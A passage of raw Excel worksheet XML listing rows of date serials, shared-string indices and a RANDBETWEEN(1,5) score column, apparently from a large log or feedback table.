      <c r="A20732" s="1">
        <v>43107.698437500003</v>
      </c>
      <c r="C20732" t="s">
        <v>144</v>
      </c>
      <c r="E20732" t="s">
        <v>18662</v>
      </c>
      <c r="F20732">
        <f t="shared" ca="1" si="323"/>
        <v>5</v>
      </c>
    </row>
    <row r="20733" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A20733" s="1">
        <v>43107.602326388886</v>
      </c>
      <c r="C20733" t="s">
        <v>10</v>
      </c>
      <c r="D20733" t="s">
        <v>36</v>
      </c>
      <c r="E20733" s="2" t="s">
        <v>18663</v>
      </c>
      <c r="F20733">
        <f t="shared" ca="1" si="323"/>
        <v>1</v>
      </c>
    </row>
    <row r="20734" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A20734" s="1">
        <v>43107.241550925923</v>
      </c>
      <c r="C20734" t="s">
        <v>197</v>
      </c>
      <c r="E20734" s="2" t="s">
        <v>18664</v>
      </c>
      <c r="F20734">
        <f t="shared" ca="1" si="323"/>
        <v>2</v>
      </c>
    </row>
    <row r="20735" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20735" s="1">
        <v>43107.060046296298</v>
      </c>
      <c r="C20735" t="s">
        <v>1050</v>
      </c>
      <c r="E20735" t="s">
        <v>18665</v>
      </c>
      <c r="F20735">
        <f t="shared" ca="1" si="323"/>
        <v>3</v>
      </c>
    </row>
    <row r="20736" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20736" s="1">
        <v>43107.003483796296</v>
      </c>
      <c r="C20736" t="s">
        <v>1050</v>
      </c>
      <c r="E20736" t="s">
        <v>18666</v>
      </c>
      <c r="F20736">
        <f t="shared" ca="1" si="323"/>
        <v>1</v>
      </c>
    </row>
    <row r="20737" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A20737" s="1">
        <v>43106.735856481479</v>
      </c>
      <c r="C20737" t="s">
        <v>229</v>
      </c>
      <c r="D20737" t="s">
        <v>14</v>
      </c>
      <c r="E20737" s="2" t="s">
        <v>18667</v>
      </c>
      <c r="F20737">
        <f t="shared" ca="1" si="323"/>
        <v>2</v>
      </c>
    </row>
    <row r="20738" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A20738" s="1">
        <v>43106.57984953704</v>
      </c>
      <c r="C20738" t="s">
        <v>10</v>
      </c>
      <c r="D20738" t="s">
        <v>23</v>
      </c>
      <c r="E20738" s="2" t="s">
        <v>18668</v>
      </c>
      <c r="F20738">
        <f t="shared" ref="F20738:F20801" ca="1" si="324">RANDBETWEEN(1,5)</f>
        <v>4</v>
      </c>
    </row>
    <row r="20739" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A20739" s="1">
        <v>43105.817986111113</v>
      </c>
      <c r="C20739" t="s">
        <v>529</v>
      </c>
      <c r="D20739" t="s">
        <v>817</v>
      </c>
      <c r="E20739" s="2" t="s">
        <v>18669</v>
      </c>
      <c r="F20739">
        <f t="shared" ca="1" si="324"/>
        <v>2</v>
      </c>
    </row>
    <row r="20740" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A20740" s="1">
        <v>43105.763449074075</v>
      </c>
      <c r="C20740" t="s">
        <v>10</v>
      </c>
      <c r="D20740" t="s">
        <v>46</v>
      </c>
      <c r="E20740" s="2" t="s">
        <v>18670</v>
      </c>
      <c r="F20740">
        <f t="shared" ca="1" si="324"/>
        <v>2</v>
      </c>
    </row>
    <row r="20741" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20741" s="1">
        <v>43105.726967592593</v>
      </c>
      <c r="C20741" t="s">
        <v>10</v>
      </c>
      <c r="D20741" t="s">
        <v>6</v>
      </c>
      <c r="E20741" t="s">
        <v>18671</v>
      </c>
      <c r="F20741">
        <f t="shared" ca="1" si="324"/>
        <v>5</v>
      </c>
    </row>
    <row r="20742" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20742" s="1">
        <v>43105.721712962964</v>
      </c>
      <c r="C20742" t="s">
        <v>10</v>
      </c>
      <c r="D20742" t="s">
        <v>151</v>
      </c>
      <c r="E20742" t="s">
        <v>18672</v>
      </c>
      <c r="F20742">
        <f t="shared" ca="1" si="324"/>
        <v>4</v>
      </c>
    </row>
    <row r="20743" spans="1:6" ht="210" x14ac:dyDescent="0.25">
      <c r="A20743" s="1">
        <v>43105.704548611109</v>
      </c>
      <c r="C20743" t="s">
        <v>10</v>
      </c>
      <c r="D20743" t="s">
        <v>36</v>
      </c>
      <c r="E20743" s="2" t="s">
        <v>18673</v>
      </c>
      <c r="F20743">
        <f t="shared" ca="1" si="324"/>
        <v>4</v>
      </c>
    </row>
    <row r="20744" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A20744" s="1">
        <v>43105.693657407406</v>
      </c>
      <c r="C20744" t="s">
        <v>10</v>
      </c>
      <c r="D20744" t="s">
        <v>494</v>
      </c>
      <c r="E20744" s="2" t="s">
        <v>18674</v>
      </c>
      <c r="F20744">
        <f t="shared" ca="1" si="324"/>
        <v>3</v>
      </c>
    </row>
    <row r="20745" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A20745" s="1">
        <v>43105.692013888889</v>
      </c>
      <c r="C20745" t="s">
        <v>10</v>
      </c>
      <c r="D20745" t="s">
        <v>89</v>
      </c>
      <c r="E20745" s="2" t="s">
        <v>18675</v>
      </c>
      <c r="F20745">
        <f t="shared" ca="1" si="324"/>
        <v>4</v>
      </c>
    </row>
    <row r="20746" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20746" s="1">
        <v>43105.652499999997</v>
      </c>
      <c r="C20746" t="s">
        <v>10</v>
      </c>
      <c r="D20746" t="s">
        <v>667</v>
      </c>
      <c r="E20746" t="s">
        <v>18676</v>
      </c>
      <c r="F20746">
        <f t="shared" ca="1" si="324"/>
        <v>2</v>
      </c>
    </row>
    <row r="20747" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20747" s="1">
        <v>43105.623356481483</v>
      </c>
      <c r="C20747" t="s">
        <v>10</v>
      </c>
      <c r="D20747" t="s">
        <v>163</v>
      </c>
      <c r="E20747" t="s">
        <v>18677</v>
      </c>
      <c r="F20747">
        <f t="shared" ca="1" si="324"/>
        <v>5</v>
      </c>
    </row>
    <row r="20748" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20748" s="1">
        <v>43105.616712962961</v>
      </c>
      <c r="C20748" t="s">
        <v>10</v>
      </c>
      <c r="D20748" t="s">
        <v>271</v>
      </c>
      <c r="E20748" t="s">
        <v>18678</v>
      </c>
      <c r="F20748">
        <f t="shared" ca="1" si="324"/>
        <v>1</v>
      </c>
    </row>
    <row r="20749" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20749" s="1">
        <v>43105.614907407406</v>
      </c>
      <c r="C20749" t="s">
        <v>10</v>
      </c>
      <c r="D20749" t="s">
        <v>244</v>
      </c>
      <c r="E20749" t="s">
        <v>18679</v>
      </c>
      <c r="F20749">
        <f t="shared" ca="1" si="324"/>
        <v>3</v>
      </c>
    </row>
    <row r="20750" spans="1:6" ht="330" x14ac:dyDescent="0.25">
      <c r="A20750" s="1">
        <v>43105.612800925926</v>
      </c>
      <c r="C20750" t="s">
        <v>10</v>
      </c>
      <c r="D20750" t="s">
        <v>14</v>
      </c>
      <c r="E20750" s="2" t="s">
        <v>18680</v>
      </c>
      <c r="F20750">
        <f t="shared" ca="1" si="324"/>
        <v>5</v>
      </c>
    </row>
    <row r="20751" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A20751" s="1">
        <v>43105.545358796298</v>
      </c>
      <c r="C20751" t="s">
        <v>10</v>
      </c>
      <c r="D20751" t="s">
        <v>6</v>
      </c>
      <c r="E20751" s="2" t="s">
        <v>18681</v>
      </c>
      <c r="F20751">
        <f t="shared" ca="1" si="324"/>
        <v>4</v>
      </c>
    </row>
    <row r="20752" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20752" s="1">
        <v>43105.517175925925</v>
      </c>
      <c r="C20752" t="s">
        <v>10</v>
      </c>
      <c r="D20752" t="s">
        <v>222</v>
      </c>
      <c r="E20752" t="s">
        <v>18682</v>
      </c>
      <c r="F20752">
        <f t="shared" ca="1" si="324"/>
        <v>3</v>
      </c>
    </row>
    <row r="20753" spans="1:6" ht="300" x14ac:dyDescent="0.25">
      <c r="A20753" s="1">
        <v>43105.507870370369</v>
      </c>
      <c r="C20753" t="s">
        <v>10</v>
      </c>
      <c r="D20753" t="s">
        <v>192</v>
      </c>
      <c r="E20753" s="2" t="s">
        <v>18683</v>
      </c>
      <c r="F20753">
        <f t="shared" ca="1" si="324"/>
        <v>1</v>
      </c>
    </row>
    <row r="20754" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A20754" s="1">
        <v>43105.503738425927</v>
      </c>
      <c r="C20754" t="s">
        <v>10</v>
      </c>
      <c r="D20754" t="s">
        <v>36</v>
      </c>
      <c r="E20754" s="2" t="s">
        <v>18684</v>
      </c>
      <c r="F20754">
        <f t="shared" ca="1" si="324"/>
        <v>1</v>
      </c>
    </row>
    <row r="20755" spans="1:6" ht="300" x14ac:dyDescent="0.25">
      <c r="A20755" s="1">
        <v>43105.49695601852</v>
      </c>
      <c r="C20755" t="s">
        <v>10</v>
      </c>
      <c r="D20755" t="s">
        <v>192</v>
      </c>
      <c r="E20755" s="2" t="s">
        <v>18683</v>
      </c>
      <c r="F20755">
        <f t="shared" ca="1" si="324"/>
        <v>4</v>
      </c>
    </row>
    <row r="20756" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20756" s="1">
        <v>43105.492534722223</v>
      </c>
      <c r="C20756" t="s">
        <v>10</v>
      </c>
      <c r="D20756" t="s">
        <v>151</v>
      </c>
      <c r="E20756" t="s">
        <v>18685</v>
      </c>
      <c r="F20756">
        <f t="shared" ca="1" si="324"/>
        <v>4</v>
      </c>
    </row>
    <row r="20757" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20757" s="1">
        <v>43105.483576388891</v>
      </c>
      <c r="C20757" t="s">
        <v>10</v>
      </c>
      <c r="D20757" t="s">
        <v>192</v>
      </c>
      <c r="E20757" t="s">
        <v>18686</v>
      </c>
      <c r="F20757">
        <f t="shared" ca="1" si="324"/>
        <v>2</v>
      </c>
    </row>
    <row r="20758" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20758" s="1">
        <v>43105.450706018521</v>
      </c>
      <c r="C20758" t="s">
        <v>10</v>
      </c>
      <c r="D20758" t="s">
        <v>151</v>
      </c>
      <c r="E20758" t="s">
        <v>18687</v>
      </c>
      <c r="F20758">
        <f t="shared" ca="1" si="324"/>
        <v>4</v>
      </c>
    </row>
    <row r="20759" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20759" s="1">
        <v>43105.387870370374</v>
      </c>
      <c r="C20759" t="s">
        <v>6</v>
      </c>
      <c r="D20759" t="s">
        <v>194</v>
      </c>
      <c r="E20759" t="s">
        <v>18688</v>
      </c>
      <c r="F20759">
        <f t="shared" ca="1" si="324"/>
        <v>2</v>
      </c>
    </row>
    <row r="20760" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A20760" s="1">
        <v>43105.380856481483</v>
      </c>
      <c r="C20760" t="s">
        <v>65</v>
      </c>
      <c r="E20760" s="2" t="s">
        <v>18689</v>
      </c>
      <c r="F20760">
        <f t="shared" ca="1" si="324"/>
        <v>5</v>
      </c>
    </row>
    <row r="20761" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20761" s="1">
        <v>43105.361817129633</v>
      </c>
      <c r="C20761" t="s">
        <v>10</v>
      </c>
      <c r="D20761" t="s">
        <v>20</v>
      </c>
      <c r="E20761" t="s">
        <v>18690</v>
      </c>
      <c r="F20761">
        <f t="shared" ca="1" si="324"/>
        <v>3</v>
      </c>
    </row>
    <row r="20762" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20762" s="1">
        <v>43105.331597222219</v>
      </c>
      <c r="C20762" t="s">
        <v>41</v>
      </c>
      <c r="E20762" t="s">
        <v>18691</v>
      </c>
      <c r="F20762">
        <f t="shared" ca="1" si="324"/>
        <v>2</v>
      </c>
    </row>
    <row r="20763" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A20763" s="1">
        <v>43105.321562500001</v>
      </c>
      <c r="C20763" t="s">
        <v>10</v>
      </c>
      <c r="D20763" t="s">
        <v>6</v>
      </c>
      <c r="E20763" s="2" t="s">
        <v>18692</v>
      </c>
      <c r="F20763">
        <f t="shared" ca="1" si="324"/>
        <v>1</v>
      </c>
    </row>
    <row r="20764" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A20764" s="1">
        <v>43105.203969907408</v>
      </c>
      <c r="C20764" t="s">
        <v>65</v>
      </c>
      <c r="E20764" s="2" t="s">
        <v>18693</v>
      </c>
      <c r="F20764">
        <f t="shared" ca="1" si="324"/>
        <v>3</v>
      </c>
    </row>
    <row r="20765" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20765" s="1">
        <v>43105.194502314815</v>
      </c>
      <c r="C20765" t="s">
        <v>65</v>
      </c>
      <c r="E20765">
        <v>420</v>
      </c>
      <c r="F20765">
        <f t="shared" ca="1" si="324"/>
        <v>5</v>
      </c>
    </row>
    <row r="20766" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A20766" s="1">
        <v>43105.193414351852</v>
      </c>
      <c r="C20766" t="s">
        <v>65</v>
      </c>
      <c r="E20766" s="2" t="s">
        <v>18694</v>
      </c>
      <c r="F20766">
        <f t="shared" ca="1" si="324"/>
        <v>1</v>
      </c>
    </row>
    <row r="20767" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A20767" s="1">
        <v>43105.122442129628</v>
      </c>
      <c r="C20767" t="s">
        <v>65</v>
      </c>
      <c r="E20767" s="2" t="s">
        <v>18695</v>
      </c>
      <c r="F20767">
        <f t="shared" ca="1" si="324"/>
        <v>1</v>
      </c>
    </row>
    <row r="20768" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A20768" s="1">
        <v>43105.063993055555</v>
      </c>
      <c r="C20768" t="s">
        <v>73</v>
      </c>
      <c r="E20768" s="2" t="s">
        <v>18696</v>
      </c>
      <c r="F20768">
        <f t="shared" ca="1" si="324"/>
        <v>1</v>
      </c>
    </row>
    <row r="20769" spans="1:6" ht="409.5" x14ac:dyDescent="0.25">
      <c r="A20769" s="1">
        <v>43105.031736111108</v>
      </c>
      <c r="C20769" t="s">
        <v>319</v>
      </c>
      <c r="E20769" s="2" t="s">
        <v>18697</v>
      </c>
      <c r="F20769">
        <f t="shared" ca="1" si="324"/>
        <v>1</v>
      </c>
    </row>
    <row r="20770" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20770" s="1">
        <v>43104.969097222223</v>
      </c>
      <c r="C20770" t="s">
        <v>10</v>
      </c>
      <c r="D20770" t="s">
        <v>23</v>
      </c>
      <c r="E20770" t="s">
        <v>18698</v>
      </c>
      <c r="F20770">
        <f t="shared" ca="1" si="324"/>
        <v>4</v>
      </c>
    </row>
    <row r="20771" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20771" s="1">
        <v>43104.967604166668</v>
      </c>
      <c r="C20771" t="s">
        <v>10</v>
      </c>
      <c r="D20771" t="s">
        <v>86</v>
      </c>
      <c r="E20771" t="s">
        <v>18699</v>
      </c>
      <c r="F20771">
        <f t="shared" ca="1" si="324"/>
        <v>4</v>
      </c>
    </row>
    <row r="20772" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20772" s="1">
        <v>43104.961840277778</v>
      </c>
      <c r="C20772" t="s">
        <v>41</v>
      </c>
      <c r="E20772" t="s">
        <v>18700</v>
      </c>
      <c r="F20772">
        <f t="shared" ca="1" si="324"/>
        <v>5</v>
      </c>
    </row>
    <row r="20773" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A20773" s="1">
        <v>43104.924247685187</v>
      </c>
      <c r="C20773" t="s">
        <v>140</v>
      </c>
      <c r="D20773" t="s">
        <v>46</v>
      </c>
      <c r="E20773" s="2" t="s">
        <v>18701</v>
      </c>
      <c r="F20773">
        <f t="shared" ca="1" si="324"/>
        <v>1</v>
      </c>
    </row>
    <row r="20774" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A20774" s="1">
        <v>43104.894733796296</v>
      </c>
      <c r="C20774" t="s">
        <v>229</v>
      </c>
      <c r="E20774" s="2" t="s">
        <v>18702</v>
      </c>
      <c r="F20774">
        <f t="shared" ca="1" si="324"/>
        <v>3</v>
      </c>
    </row>
    <row r="20775" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20775" s="1">
        <v>43104.826331018521</v>
      </c>
      <c r="C20775" t="s">
        <v>10</v>
      </c>
      <c r="D20775" t="s">
        <v>6</v>
      </c>
      <c r="E20775" t="s">
        <v>18703</v>
      </c>
      <c r="F20775">
        <f t="shared" ca="1" si="324"/>
        <v>5</v>
      </c>
    </row>
    <row r="20776" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20776" s="1">
        <v>43104.728009259263</v>
      </c>
      <c r="C20776" t="s">
        <v>10</v>
      </c>
      <c r="E20776" t="s">
        <v>18704</v>
      </c>
      <c r="F20776">
        <f t="shared" ca="1" si="324"/>
        <v>2</v>
      </c>
    </row>
    <row r="20777" spans="1:6" ht="285" x14ac:dyDescent="0.25">
      <c r="A20777" s="1">
        <v>43104.650613425925</v>
      </c>
      <c r="C20777" t="s">
        <v>189</v>
      </c>
      <c r="E20777" s="2" t="s">
        <v>18705</v>
      </c>
      <c r="F20777">
        <f t="shared" ca="1" si="324"/>
        <v>5</v>
      </c>
    </row>
    <row r="20778" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20778" s="1">
        <v>43104.637615740743</v>
      </c>
      <c r="C20778" t="s">
        <v>10</v>
      </c>
      <c r="D20778" t="s">
        <v>23</v>
      </c>
      <c r="E20778" t="s">
        <v>18706</v>
      </c>
      <c r="F20778">
        <f t="shared" ca="1" si="324"/>
        <v>1</v>
      </c>
    </row>
    <row r="20779" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20779" s="1">
        <v>43104.632615740738</v>
      </c>
      <c r="C20779" t="s">
        <v>10</v>
      </c>
      <c r="D20779" t="s">
        <v>993</v>
      </c>
      <c r="E20779" t="s">
        <v>18707</v>
      </c>
      <c r="F20779">
        <f t="shared" ca="1" si="324"/>
        <v>4</v>
      </c>
    </row>
    <row r="20780" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20780" s="1">
        <v>43104.627754629626</v>
      </c>
      <c r="C20780" t="s">
        <v>10</v>
      </c>
      <c r="D20780" t="s">
        <v>163</v>
      </c>
      <c r="E20780" t="s">
        <v>18708</v>
      </c>
      <c r="F20780">
        <f t="shared" ca="1" si="324"/>
        <v>4</v>
      </c>
    </row>
    <row r="20781" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A20781" s="1">
        <v>43104.62400462963</v>
      </c>
      <c r="C20781" t="s">
        <v>10</v>
      </c>
      <c r="D20781" t="s">
        <v>163</v>
      </c>
      <c r="E20781" s="2" t="s">
        <v>18709</v>
      </c>
      <c r="F20781">
        <f t="shared" ca="1" si="324"/>
        <v>4</v>
      </c>
    </row>
    <row r="20782" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20782" s="1">
        <v>43104.623182870368</v>
      </c>
      <c r="C20782" t="s">
        <v>10</v>
      </c>
      <c r="D20782" t="s">
        <v>192</v>
      </c>
      <c r="E20782" t="s">
        <v>18710</v>
      </c>
      <c r="F20782">
        <f t="shared" ca="1" si="324"/>
        <v>2</v>
      </c>
    </row>
    <row r="20783" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20783" s="1">
        <v>43104.613854166666</v>
      </c>
      <c r="C20783" t="s">
        <v>10</v>
      </c>
      <c r="D20783" t="s">
        <v>271</v>
      </c>
      <c r="E20783" t="s">
        <v>18711</v>
      </c>
      <c r="F20783">
        <f t="shared" ca="1" si="324"/>
        <v>3</v>
      </c>
    </row>
    <row r="20784" spans="1:6" ht="225" x14ac:dyDescent="0.25">
      <c r="A20784" s="1">
        <v>43104.599039351851</v>
      </c>
      <c r="C20784" t="s">
        <v>4852</v>
      </c>
      <c r="D20784" t="s">
        <v>480</v>
      </c>
      <c r="E20784" s="2" t="s">
        <v>18712</v>
      </c>
      <c r="F20784">
        <f t="shared" ca="1" si="324"/>
        <v>4</v>
      </c>
    </row>
    <row r="20785" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A20785" s="1">
        <v>43104.591689814813</v>
      </c>
      <c r="C20785" t="s">
        <v>6</v>
      </c>
      <c r="D20785" t="s">
        <v>821</v>
      </c>
      <c r="E20785" s="2" t="s">
        <v>18713</v>
      </c>
      <c r="F20785">
        <f t="shared" ca="1" si="324"/>
        <v>5</v>
      </c>
    </row>
    <row r="20786" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20786" s="1">
        <v>43104.585370370369</v>
      </c>
      <c r="C20786" t="s">
        <v>10</v>
      </c>
      <c r="D20786" t="s">
        <v>86</v>
      </c>
      <c r="E20786" t="s">
        <v>18714</v>
      </c>
      <c r="F20786">
        <f t="shared" ca="1" si="324"/>
        <v>1</v>
      </c>
    </row>
    <row r="20787" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20787" s="1">
        <v>43104.58153935185</v>
      </c>
      <c r="C20787" t="s">
        <v>10</v>
      </c>
      <c r="D20787" t="s">
        <v>56</v>
      </c>
      <c r="E20787" t="s">
        <v>18715</v>
      </c>
      <c r="F20787">
        <f t="shared" ca="1" si="324"/>
        <v>1</v>
      </c>
    </row>
    <row r="20788" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20788" s="1">
        <v>43104.58153935185</v>
      </c>
      <c r="C20788" t="s">
        <v>10</v>
      </c>
      <c r="D20788" t="s">
        <v>56</v>
      </c>
      <c r="E20788" t="s">
        <v>18715</v>
      </c>
      <c r="F20788">
        <f t="shared" ca="1" si="324"/>
        <v>1</v>
      </c>
    </row>
    <row r="20789" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20789" s="1">
        <v>43104.578912037039</v>
      </c>
      <c r="C20789" t="s">
        <v>10</v>
      </c>
      <c r="D20789" t="s">
        <v>23</v>
      </c>
      <c r="E20789" t="s">
        <v>18716</v>
      </c>
      <c r="F20789">
        <f t="shared" ca="1" si="324"/>
        <v>2</v>
      </c>
    </row>
    <row r="20790" spans="1:6" ht="195" x14ac:dyDescent="0.25">
      <c r="A20790" s="1">
        <v>43104.577314814815</v>
      </c>
      <c r="C20790" t="s">
        <v>471</v>
      </c>
      <c r="D20790" t="s">
        <v>312</v>
      </c>
      <c r="E20790" s="2" t="s">
        <v>18717</v>
      </c>
      <c r="F20790">
        <f t="shared" ca="1" si="324"/>
        <v>4</v>
      </c>
    </row>
    <row r="20791" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A20791" s="1">
        <v>43104.556817129633</v>
      </c>
      <c r="C20791" t="s">
        <v>48</v>
      </c>
      <c r="E20791" s="2" t="s">
        <v>18718</v>
      </c>
      <c r="F20791">
        <f t="shared" ca="1" si="324"/>
        <v>5</v>
      </c>
    </row>
    <row r="20792" spans="1:6" ht="345" x14ac:dyDescent="0.25">
      <c r="A20792" s="1">
        <v>43104.506249999999</v>
      </c>
      <c r="C20792" t="s">
        <v>10</v>
      </c>
      <c r="D20792" t="s">
        <v>56</v>
      </c>
      <c r="E20792" s="2" t="s">
        <v>18719</v>
      </c>
      <c r="F20792">
        <f t="shared" ca="1" si="324"/>
        <v>2</v>
      </c>
    </row>
    <row r="20793" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20793" s="1">
        <v>43104.505497685182</v>
      </c>
      <c r="C20793" t="s">
        <v>10</v>
      </c>
      <c r="D20793" t="s">
        <v>39</v>
      </c>
      <c r="E20793" t="s">
        <v>18720</v>
      </c>
      <c r="F20793">
        <f t="shared" ca="1" si="324"/>
        <v>5</v>
      </c>
    </row>
    <row r="20794" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A20794" s="1">
        <v>43104.502314814818</v>
      </c>
      <c r="C20794" t="s">
        <v>10</v>
      </c>
      <c r="D20794" t="s">
        <v>23</v>
      </c>
      <c r="E20794" s="2" t="s">
        <v>18721</v>
      </c>
      <c r="F20794">
        <f t="shared" ca="1" si="324"/>
        <v>1</v>
      </c>
    </row>
    <row r="20795" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A20795" s="1">
        <v>43104.497407407405</v>
      </c>
      <c r="C20795" t="s">
        <v>10</v>
      </c>
      <c r="D20795" t="s">
        <v>23</v>
      </c>
      <c r="E20795" s="2" t="s">
        <v>18722</v>
      </c>
      <c r="F20795">
        <f t="shared" ca="1" si="324"/>
        <v>2</v>
      </c>
    </row>
    <row r="20796" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20796" s="1">
        <v>43104.482766203706</v>
      </c>
      <c r="C20796" t="s">
        <v>10</v>
      </c>
      <c r="D20796" t="s">
        <v>80</v>
      </c>
      <c r="E20796" t="s">
        <v>18723</v>
      </c>
      <c r="F20796">
        <f t="shared" ca="1" si="324"/>
        <v>1</v>
      </c>
    </row>
    <row r="20797" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20797" s="1">
        <v>43104.477847222224</v>
      </c>
      <c r="C20797" t="s">
        <v>10</v>
      </c>
      <c r="D20797" t="s">
        <v>94</v>
      </c>
      <c r="E20797" t="s">
        <v>18724</v>
      </c>
      <c r="F20797">
        <f t="shared" ca="1" si="324"/>
        <v>4</v>
      </c>
    </row>
    <row r="20798" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A20798" s="1">
        <v>43104.471875000003</v>
      </c>
      <c r="C20798" t="s">
        <v>10</v>
      </c>
      <c r="D20798" t="s">
        <v>56</v>
      </c>
      <c r="E20798" s="2" t="s">
        <v>18725</v>
      </c>
      <c r="F20798">
        <f t="shared" ca="1" si="324"/>
        <v>5</v>
      </c>
    </row>
    <row r="20799" spans="1:6" ht="195" x14ac:dyDescent="0.25">
      <c r="A20799" s="1">
        <v>43104.462939814817</v>
      </c>
      <c r="C20799" t="s">
        <v>907</v>
      </c>
      <c r="E20799" s="2" t="s">
        <v>18726</v>
      </c>
      <c r="F20799">
        <f t="shared" ca="1" si="324"/>
        <v>1</v>
      </c>
    </row>
    <row r="20800" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A20800" s="1">
        <v>43104.448993055557</v>
      </c>
      <c r="C20800" t="s">
        <v>189</v>
      </c>
      <c r="E20800" s="2" t="s">
        <v>18727</v>
      </c>
      <c r="F20800">
        <f t="shared" ca="1" si="324"/>
        <v>1</v>
      </c>
    </row>
    <row r="20801" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A20801" s="1">
        <v>43104.448344907411</v>
      </c>
      <c r="C20801" t="s">
        <v>280</v>
      </c>
      <c r="D20801" t="s">
        <v>178</v>
      </c>
      <c r="E20801" s="2" t="s">
        <v>18728</v>
      </c>
      <c r="F20801">
        <f t="shared" ca="1" si="324"/>
        <v>5</v>
      </c>
    </row>
    <row r="20802" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20802" s="1">
        <v>43104.440625000003</v>
      </c>
      <c r="C20802" t="s">
        <v>1209</v>
      </c>
      <c r="D20802" t="s">
        <v>1056</v>
      </c>
      <c r="E20802" t="s">
        <v>18729</v>
      </c>
      <c r="F20802">
        <f t="shared" ref="F20802:F20865" ca="1" si="325">RANDBETWEEN(1,5)</f>
        <v>4</v>
      </c>
    </row>
    <row r="20803" spans="1:6" ht="405" x14ac:dyDescent="0.25">
      <c r="A20803" s="1">
        <v>43104.426608796297</v>
      </c>
      <c r="C20803" t="s">
        <v>10</v>
      </c>
      <c r="D20803" t="s">
        <v>6</v>
      </c>
      <c r="E20803" s="2" t="s">
        <v>18730</v>
      </c>
      <c r="F20803">
        <f t="shared" ca="1" si="325"/>
        <v>2</v>
      </c>
    </row>
    <row r="20804" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A20804" s="1">
        <v>43104.412962962961</v>
      </c>
      <c r="C20804" t="s">
        <v>65</v>
      </c>
      <c r="E20804" s="2" t="s">
        <v>18731</v>
      </c>
      <c r="F20804">
        <f t="shared" ca="1" si="325"/>
        <v>1</v>
      </c>
    </row>
    <row r="20805" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A20805" s="1">
        <v>43104.371944444443</v>
      </c>
      <c r="C20805" t="s">
        <v>71</v>
      </c>
      <c r="E20805" s="2" t="s">
        <v>18732</v>
      </c>
      <c r="F20805">
        <f t="shared" ca="1" si="325"/>
        <v>5</v>
      </c>
    </row>
    <row r="20806" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A20806" s="1">
        <v>43104.371203703704</v>
      </c>
      <c r="C20806" t="s">
        <v>50</v>
      </c>
      <c r="E20806" s="2" t="s">
        <v>18733</v>
      </c>
      <c r="F20806">
        <f t="shared" ca="1" si="325"/>
        <v>5</v>
      </c>
    </row>
    <row r="20807" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A20807" s="1">
        <v>43104.258425925924</v>
      </c>
      <c r="C20807" t="s">
        <v>134</v>
      </c>
      <c r="D20807" t="s">
        <v>312</v>
      </c>
      <c r="E20807" s="2" t="s">
        <v>18734</v>
      </c>
      <c r="F20807">
        <f t="shared" ca="1" si="325"/>
        <v>1</v>
      </c>
    </row>
    <row r="20808" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A20808" s="1">
        <v>43104.237847222219</v>
      </c>
      <c r="C20808" t="s">
        <v>71</v>
      </c>
